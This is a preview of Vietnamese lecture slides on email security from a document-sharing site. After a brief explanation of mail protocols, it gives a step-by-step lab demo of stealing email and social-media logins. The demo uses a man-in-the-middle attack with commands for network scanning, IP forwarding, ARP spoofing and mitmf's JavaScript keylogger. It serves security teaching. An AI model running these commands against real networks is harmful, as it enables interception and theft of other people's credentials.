Tải bản đầy đủ (.pptx) (218 trang)
  1. Trang chủ
    2. >>
  2. Công nghệ thông tin
    3. >>
  3. Bảo mật

Email hacking and security

Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (6.6 MB, 218 trang )

Giảng viên: Nguyễn Phát Tài –


EMAIL HACKING AND SECURITY
Giới thiệu về dịch vụ Thư điện tử (Electronic Mail):

❑ Mail Server: Dùng để lưu trữ mail và phát mail.





Mail Server 1

Mail Server 2

Mail Server N

SMTP Server

SMTP Server

SMTP Server

POP3/IMAP4Server

POP3/IMAP4 Server

POP3/IMAP4 Server

Email Client



Email Client

Email Client

SMTP: Simple Mail Transfer Protocol
POP3: Post Office Protocol v.3
IMAP4: Internet Message Access Protocol v.4


EMAIL HACKING AND SECURITY



Mail Client: Chương trình dùng để gửi thư điện tử dành cho các máy trạm.



Windows Live Mail



Microsoft Outlook



Web Mail


EMAIL HACKING AND SECURITY

5. Man In The Middle Hacking:


EMAIL HACKING AND SECURITY



EMAIL HACKING AND SECURITY


EMAIL HACKING AND SECURITY


EMAIL HACKING AND SECURITY


EMAIL HACKING AND SECURITY


EMAIL HACKING AND SECURITY


EMAIL HACKING AND SECURITY
DEMO1: Kỹ thuật tấn công lấy cắp tài khoản Email:
Thực
Thực hiện
hiện trên
trên máy
máy Hacker:
Hacker:

B1: Mở Kali Linux -> chạy chương trình Terminal -> thực hiện lệnh route -n để tìm địa chỉ Router.


EMAIL HACKING AND SECURITY
B2: Thực hiện lệnh netdiscover -r 192.168.1.0/24 để dò tìm các máy nạn nhân (Victim cần tấn công).


EMAIL HACKING AND SECURITY
Tương tự: Có thể thực hiện lệnh nmap -sP 192.168.1.0/24 để dò tìm các máy nạn nhân (Victim cần tấn
công).



EMAIL HACKING AND SECURITY
B3: Thực hiện lệnh cho phép chuyển tiếp các gói tin của máy Victim qua máy Hacker
echo "1" > /proc/sys/net/ipv4/ip_forward


EMAIL HACKING AND SECURITY
B4: Thực hiện lệnh thêm tất cả các gói tin chạy trên port 80 của máy Victim chuyển qua port 4444 của máy
Hacker.


EMAIL HACKING AND SECURITY
B5: Thực hiện lệnh mitmf --help để xem trợ giúp của lệnh tấn công Man In The Middle.


EMAIL HACKING AND SECURITY
B6: Thực hiện lệnh tấn công máy Victim.
mitmf -i eth0 -l 4444 --arp --spoof --targets 192.168.1.12 --gateway 192.168.1.1 --jskeylogger --hsts --hta



EMAIL HACKING AND SECURITY

Thực
Thực hiện
hiện trên
trên máy
máy Victim:
Victim:
B7: Mở chương trình duyệt Firefox hay Cốc Cốc, Chrome, IE -> truy cập vào các trang web có phần đăng
nhập.
Ví dụ: live.com


EMAIL HACKING AND SECURITY

Thực
Thực hiện
hiện trên
trên máy
máy Hacker:
Hacker:
B8: Quay về cửa sổ Terminal của Hacker -> kiểm tra thông tin đăng nhập đã nghe lén & ghi lại được từ bàn
phím của máy Victim.


EMAIL HACKING AND SECURITY

Thực

Thực hiện
hiện trên
trên máy
máy Victim:
Victim:
B9. Mở chương trình duyệt IE 7,8,9,10 -> truy cập vào các trang web có phần đăng nhập.
Ví dụ: facebook.com


EMAIL HACKING AND SECURITY

Thực
Thực hiện
hiện trên
trên máy
máy Hacker:
Hacker:
B10: Quay về cửa sổ Terminal của Hacker -> kiểm tra thông tin đăng nhập đã nghe lén & ghi lại được từ bàn
phím của máy Victim.


EMAIL HACKING AND SECURITY

Thực
Thực hiện
hiện trên
trên máy
máy Victim:
Victim:
B11. Mở chương trình duyệt Chrome/Firefox-> thử truy cập vào Webmail mail.disico.edu.vn



EMAIL HACKING AND SECURITY

Thực
Thực hiện
hiện trên
trên máy
máy Hacker:
Hacker:
B12: Quay về cửa sổ Terminal của Hacker -> kiểm tra thông tin đăng nhập đã nghe lén & ghi lại được từ bàn
phím của máy Victim.


Tài liệu liên quan

Tài liệu bạn tìm kiếm đã sẵn sàng tải về

Tải bản đầy đủ ngay
×